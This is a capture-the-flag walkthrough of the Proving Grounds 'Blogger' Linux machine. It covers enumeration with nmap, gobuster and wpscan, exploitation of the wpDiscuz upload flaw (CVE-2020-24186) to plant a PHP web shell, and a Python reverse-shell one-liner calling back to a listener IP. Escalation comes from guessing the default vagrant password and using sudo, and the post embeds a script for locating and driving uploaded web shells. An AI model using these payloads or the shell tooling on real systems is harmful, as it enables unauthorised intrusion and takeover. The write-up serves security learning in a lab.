PG - Blogger


In this walkthrough we go through the Blogger machine from Proving Grounds. It is rated Easy on the platform. Initial access comes from enumerating and exploiting a WordPress plugin; privilege escalation takes some password guessing followed by abuse of an over-permissive sudo rule to get root on the server. So, let's get started without any delay.

Blogger

Machine Info:

Title: Blogger
IP address: 192.168.224.217
Difficulty: Easy
OS: Linux
Description: Blogger is an easy machine which requires WordPress plugin enumeration and exploitation to get initial access, and then some password guessing and misconfigured sudo permissions to get root on the server.

Enumeration:

  • I started off with a regular nmap scan with service version detection enabled and found two ports open: 22 (SSH) and 80 (HTTP). Port 53 showed up as filtered only.

$ sudo nmap -sS -sV 192.168.224.217
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 13:36 IST

Nmap scan report for 192.168.224.217
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.61 seconds

nmap scan

Enumerating Port 80 (HTTP)

  • Enumerated the web server on port 80 and found a static portfolio website running.

Blogger website

  • There is a login button in the site's menu. I registered as a user, but that did not open up any further way in.

Login panel

Register

  • Next, I fired gobuster at the target to reveal hidden directories. It found a few; the interesting one was /assets.

$ gobuster dir -u http://192.168.224.217/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.224.217/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2024/01/11 13:47:49 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 319] [--> http://192.168.224.217/images/]
/js                   (Status: 301) [Size: 315] [--> http://192.168.224.217/js/]    
/css                  (Status: 301) [Size: 316] [--> http://192.168.224.217/css/]   
/assets               (Status: 301) [Size: 319] [--> http://192.168.224.217/assets/]
/server-status        (Status: 403) [Size: 280]                                     
                                                                                    
===============================================================
2024/01/11 13:54:45 Finished

gobuster scan

  • Browsing the directory listing further, I found a "blog" sub-directory under /assets/fonts/.

Index of /assets

Index of /assets/fonts

  • The posts in the blog directory link to a particular domain, blogger.thm, so I added it to my /etc/hosts file (mapped to 192.168.224.217) and accessed the site through that name. The blog turned out to be running WordPress.

Blogger posts

blogger.thm

Blogger Latest posts

Enumerating WordPress CMS

  • Moving on, I used wpscan to enumerate the WordPress installation further, initially looking for all plugins (ap), all themes (at) and users (u).

$ wpscan --url http://blogger.thm/assets/fonts/blog/ -e ap,at,u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://blogger.thm/assets/fonts/blog/ [192.168.224.217]
[+] Started: Thu Jan 11 14:21:42 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blogger.thm/assets/fonts/blog/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blogger.thm/assets/fonts/blog/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blogger.thm/assets/fonts/blog/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blogger.thm/assets/fonts/blog/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.8 identified (Insecure, released on 2018-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/?feed=rss2, <generator>https://wordpress.org/?v=4.9.8</generator>
 |  - http://blogger.thm/assets/fonts/blog/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.9.8</generator>

[+] WordPress theme in use: poseidon
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/
 | Last Updated: 2022-10-20T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/readme.txt
 | [!] The version is out of date, the latest version is 2.3.9
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css?ver=2.1.1
 | Style Name: Poseidon
 | Style URI: https://themezee.com/themes/poseidon/
 | Description: Poseidon is an elegant designed WordPress theme featuring a splendid fullscreen image slideshow. The...
 | Author: ThemeZee
 | Author URI: https://themezee.com
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css?ver=2.1.1, Match: 'Version: 2.1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating All Themes (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:20:51 <==========================================================================================================> (26636 / 26636) 100.00% Time: 00:20:51
[+] Checking Theme Versions (via Passive and Aggressive Methods)

[i] Theme(s) Identified:

[+] poseidon
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/
 | Last Updated: 2022-10-20T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/readme.txt
 | [!] The version is out of date, the latest version is 2.3.9
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css
 | Style Name: Poseidon
 | Style URI: https://themezee.com/themes/poseidon/
 | Description: Poseidon is an elegant designed WordPress theme featuring a splendid fullscreen image slideshow. The...
 | Author: ThemeZee
 | Author URI: https://themezee.com
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/, status: 500
 |
 | Version: 2.1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/poseidon/style.css, Match: 'Version: 2.1.1'

[+] twentyfifteen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.6
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/style.css
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/, status: 500
 |
 | Version: 2.0 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 2.0'

[+] twentyseventeen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/style.css
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/, status: 500
 |
 | Version: 1.7 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.7'

[+] twentysixteen
 | Location: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/readme.txt
 | [!] The version is out of date, the latest version is 3.1
 | Style URL: http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/style.css
 | Style Name: Twenty Sixteen
 | Style URI: https://wordpress.org/themes/twentysixteen/
 | Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/, status: 500
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://blogger.thm/assets/fonts/blog/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.5'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <================================================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] j@m3s
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jm3s
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Jan 11 14:42:55 2024
[+] Requests Done: 26708
[+] Cached Requests: 14
[+] Data Sent: 7.691 MB
[+] Data Received: 4.265 MB
[+] Memory used: 323.953 MB
[+] Elapsed time: 00:21:12

wpscan scan


Users Identified

  • The previous scan gave plenty of information, but nothing with a known exploit that would give initial access. Brute-forcing the WordPress login with the discovered usernames and a common password wordlist also got nowhere. So I re-enumerated the plugins, this time aggressively: the default passive plugin detection only spots plugins referenced from the pages wpscan fetches, while aggressive detection requests each known plugin path under wp-content/plugins/ directly, which is slower but finds plugins that leave no trace in the HTML.

wpscan --url http://blogger.thm/assets/fonts/blog/ --plugins-detection aggressive -e ap

Plugin Identified

Initial Access:

  • This found two plugins, wpDiscuz and Akismet. Checking both for known exploits turned up an unauthenticated arbitrary file upload in wpDiscuz (CVE-2020-24186, affecting versions 7.0.0 to 7.0.4), which can be escalated to remote code execution by uploading a PHP file.

Wordpress Plugin wpDiscuz 7.0.4 RCE

  • I used the exploit below, but it did not give me a shell. Going by its output, the web shell was uploaded to the server successfully; the exploit then failed to execute it.

python3 49967.py -u http://blogger.thm/assets/fonts/blog/ -p /?p=29

firing exploit

  • Since the uploads directory has listing enabled (wpscan flagged this earlier), I could browse to where the shell was stored, and then appended the ?cmd parameter the exploit's payload expects. The response then contains the output of whatever command is given.

Uploads directory

http://blogger.thm/assets/fonts/blog/wp-content/uploads/2024/01/djnxvscwscmaadr-1705075469.8528.php?cmd=whoami

got access via web shell
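Instead of hunting for the uploaded file by hand each time, the two findings above (a listing-enabled uploads directory and a payload that reads its command from ?cmd=) can be scripted. The following Python is an added example written for this walkthrough; it is not the author's code and not part of the 49967.py exploit. It parses an Apache directory listing, picks the most recently uploaded .php file by the Unix timestamp embedded in its name (an assumption based on the filename seen above), and builds the command URL. The listing HTML in it is constructed; the uploads URL and the parameter name cmd are taken from the walkthrough.

```python
"""Find a freshly uploaded PHP web shell in a listing-enabled WordPress
uploads directory and build the ?cmd= request that drives it.

Added example for this walkthrough: not the author's code and not part of
the 49967.py exploit. Assumptions: the listing is a stock Apache
mod_autoindex page, the uploaded payload reads its command from a GET
parameter named 'cmd' (as used above), and the uploaded file name ends in
'-<unix time>.php' like the one seen in the walkthrough.
"""
import re
import urllib.parse
import urllib.request
from html.parser import HTMLParser

# Uploads directory from the walkthrough (WordPress lays uploads out by year/month).
UPLOADS = "http://blogger.thm/assets/fonts/blog/wp-content/uploads/2024/01/"


class _LinkParser(HTMLParser):
    """Collect href values of <a> tags; autoindex pages list one per entry."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.append(value)


def php_files_in_listing(html):
    """Return the .php entries of an Apache directory listing, sorted by name.

    Column-sort links ("?C=N;O=D") and the parent-directory link contain '?'
    or '/' and are dropped, so only plain file names in this directory survive.
    """
    parser = _LinkParser()
    parser.feed(html)
    return sorted(h for h in parser.hrefs
                  if h.lower().endswith(".php") and "?" not in h and "/" not in h)


def pick_shell(html):
    """Pick the most recently uploaded PHP file.

    The exploit names its payload <random>-<unix time>.php, so the largest
    embedded timestamp is the newest upload (assumption based on the name
    seen in the walkthrough). Returns None if the listing has no PHP files.
    """
    def stamp(name):
        m = re.search(r"-(\d+(?:\.\d+)?)\.php$", name)
        return float(m.group(1)) if m else -1.0

    candidates = php_files_in_listing(html)
    return max(candidates, key=stamp) if candidates else None


def command_url(base, shell_name, cmd, param="cmd"):
    """Build the GET URL; urlencode so ';', quotes and spaces survive the trip."""
    return urllib.parse.urljoin(base, shell_name) + "?" + urllib.parse.urlencode({param: cmd})


def run(base, shell_name, cmd, timeout=10):
    """Send the command and return the response body (network; not run offline)."""
    with urllib.request.urlopen(command_url(base, shell_name, cmd), timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


# Constructed listing modelled on Apache's autoindex output. Only the second
# PHP name is the one from the walkthrough; the other entries are made up.
SAMPLE_LISTING = """<html><head><title>Index of /assets/fonts/blog/wp-content/uploads/2024/01</title></head>
<body><h1>Index of /assets/fonts/blog/wp-content/uploads/2024/01</h1>
<pre><a href="?C=N;O=D">Name</a> <a href="?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a>
<hr><a href="/assets/fonts/blog/wp-content/uploads/2024/">Parent Directory</a>
<a href="abcdefghijkl-1705075000.1234.php">abcdefghijkl-1705075000.1234.php</a>
<a href="djnxvscwscmaadr-1705075469.8528.php">djnxvscwscmaadr-1705075469.8528.php</a>
<a href="hero-image.jpg">hero-image.jpg</a>
<hr></pre></body></html>"""

if __name__ == "__main__":
    shell = pick_shell(SAMPLE_LISTING)
    print(command_url(UPLOADS, shell, "id; uname -a"))
    # print(run(UPLOADS, shell, "id"))  # only against the live target
```

run() is the only part that touches the network; everything else works on a saved copy of the listing, which is why the sample data is inlined. Against the live box you would fetch the uploads directory with urllib first and feed that HTML to pick_shell().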

  • Let's upgrade our access by running the reverse shell payload below through the web shell and catching the connection with a netcat listener on port 1234. URL-encode the payload when placing it in the cmd parameter; otherwise the semicolons, quotes and spaces get mangled on the way.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.221",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

got initial access

  • I checked wp-config.php and found the MySQL username and password. Enumerating further with those credentials turned up nothing interesting.

cat wp-config.php


  • Captured the local.txt flag in james's home directory.

local flag

Privilege Escalation:

  • Next, I uploaded and ran LinPEAS on the target. It revealed a cron job that runs as root.

cronjobs

  • Further enumeration of backup.sh showed that the file is not writable by us and that it writes a backup into james's home directory. I tried a PATH hijack on the tar binary, since the script calls it without an absolute path, but it failed. That is expected unless a directory that appears in cron's PATH before the one holding the real tar is writable: cron does not inherit the PATH of the shell we hold, it uses the PATH set in the crontab (Ubuntu's /etc/crontab sets /usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin), and none of those directories is writable by an unprivileged user on a sanely configured box.

ls -l /usr/local/bin/backup.sh
cat /usr/local/bin/backup.sh

backup.sh
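To see why the PATH hijack fails before spending time on it, check the conditions it needs. The following Python is an added example written for this walkthrough, not the author's code: given a script's text and the PATH cron will use, it lists the commands invoked by bare name and reports any writable directory that would shadow the real binary, plus whether the script itself is writable. The backup.sh contents in it are a constructed stand-in (the real script on the box differs), and the cron PATH is Ubuntu's /etc/crontab default.

```python
"""Check whether a root cron script can be PATH-hijacked.

Added example for this walkthrough, not the author's code. tar is called by
bare name in backup.sh, so would a planted tar win? Only if a directory that
cron searches before the real tar is writable by us (or the script itself
is). Cron uses the PATH set in the crontab, not the PATH of our shell;
CRON_PATH assumes Ubuntu's /etc/crontab default. SAMPLE_SCRIPT is a
constructed stand-in; the real backup.sh on the box differs.
"""
import os
import re
import shlex
import shutil
import tempfile

SAMPLE_SCRIPT = """#!/bin/bash
cd /home/james
tar -czf /home/james/backup.tar.gz /var/www
/bin/chown james:james /home/james/backup.tar.gz
"""

CRON_PATH = "/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin"
SHELL_BUILTINS = {"cd", "export", "echo", "exit", "set", "source", ".", "umask"}
_SEPARATORS = re.compile(r"\s*(?:&&|\|\||[|;])\s*")
_ASSIGNMENT = re.compile(r"^[A-Za-z_]\w*=")


def bare_commands(script):
    """Command names the script invokes without a path, in order of appearance."""
    names = []
    for line in script.splitlines():
        for simple in _SEPARATORS.split(line):
            try:
                words = shlex.split(simple, comments=True)
            except ValueError:  # unbalanced quotes: skip the fragment
                continue
            while words and _ASSIGNMENT.match(words[0]):  # drop VAR=value prefixes
                words.pop(0)
            if words and "/" not in words[0] and words[0] not in SHELL_BUILTINS:
                names.append(words[0])
    return names


def resolve(name, path):
    """First executable `name` along `path`, as execvp would find it."""
    for d in path.split(":"):
        candidate = os.path.join(d, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def shadowing_dirs(name, path):
    """Writable directories that precede the real binary in `path`.

    If the binary is not on the path at all, every writable directory counts.
    """
    real = resolve(name, path)
    wins = []
    for d in path.split(":"):
        if real is not None and os.path.join(d, name) == real:
            break
        if os.path.isdir(d) and os.access(d, os.W_OK):
            wins.append(d)
    return wins


def audit(script_path, script_text, path=CRON_PATH):
    """Report what a PATH hijack against this cron script would need."""
    shadowable = {}
    for name in dict.fromkeys(bare_commands(script_text)):  # unique, ordered
        dirs = shadowing_dirs(name, path)
        if dirs:
            shadowable[name] = dirs
    return {
        "script_writable": os.path.exists(script_path) and os.access(script_path, os.W_OK),
        "shadowable": shadowable,
    }


def demo():
    """Audit against a temporary PATH: a writable directory ahead of the real
    tar (hijackable), then the real tar first (not hijackable)."""
    root = tempfile.mkdtemp()
    try:
        planted = os.path.join(root, "planted")
        bindir = os.path.join(root, "bin")
        os.makedirs(planted)
        os.makedirs(bindir)
        fake_tar = os.path.join(bindir, "tar")
        with open(fake_tar, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(fake_tar, 0o755)
        weak = audit("/nonexistent/backup.sh", SAMPLE_SCRIPT, planted + ":" + bindir)
        sane = audit("/nonexistent/backup.sh", SAMPLE_SCRIPT, bindir + ":" + planted)
        return weak["shadowable"].get("tar") == [planted], sane["shadowable"] == {}
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    print(audit("/usr/local/bin/backup.sh", SAMPLE_SCRIPT))  # on the target, read the real file
    print(demo())
```

On the target you would read the real /usr/local/bin/backup.sh into script_text and pass the PATH line from the crontab that schedules it. An empty "shadowable" with script_writable False is the result seen here, and it tells you to look elsewhere for the escalation rather than keep planting binaries.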

  • After a lot of head-banging, I found that we can switch to the user vagrant with the password "vagrant". This was pure guesswork and needs no special enumeration, though the guess is an informed one: vagrant/vagrant is the default account on Vagrant base boxes, so seeing a vagrant user on the machine (in /etc/passwd or under /home) is reason enough to try it.

su vagrant
vagrant


  • Checked the sudo permissions for the user and found that vagrant can run any command as root without a password (an entry of the form (ALL) NOPASSWD: ALL in the sudo -l output).

sudo -l


  • With that permission, I switched to root and captured the root flag.

sudo su

proof flag


Conclusion:


So that was Blogger for you. We started off with a regular nmap scan and found two ports open: 22 (SSH) and 80 (HTTP). Directory brute-forcing led to a WordPress installation under /assets/fonts/blog, served for the virtual host blogger.thm. Aggressive plugin enumeration showed that the wpDiscuz plugin is vulnerable to unauthenticated file upload and thus RCE (CVE-2020-24186), which gave initial access. Then, with some password guessing, we switched to the user vagrant with the password "vagrant" and used its unrestricted NOPASSWD sudo rule to get root. On that note, I will take your leave and will meet you in the next one. Till then, "Happy hacking".
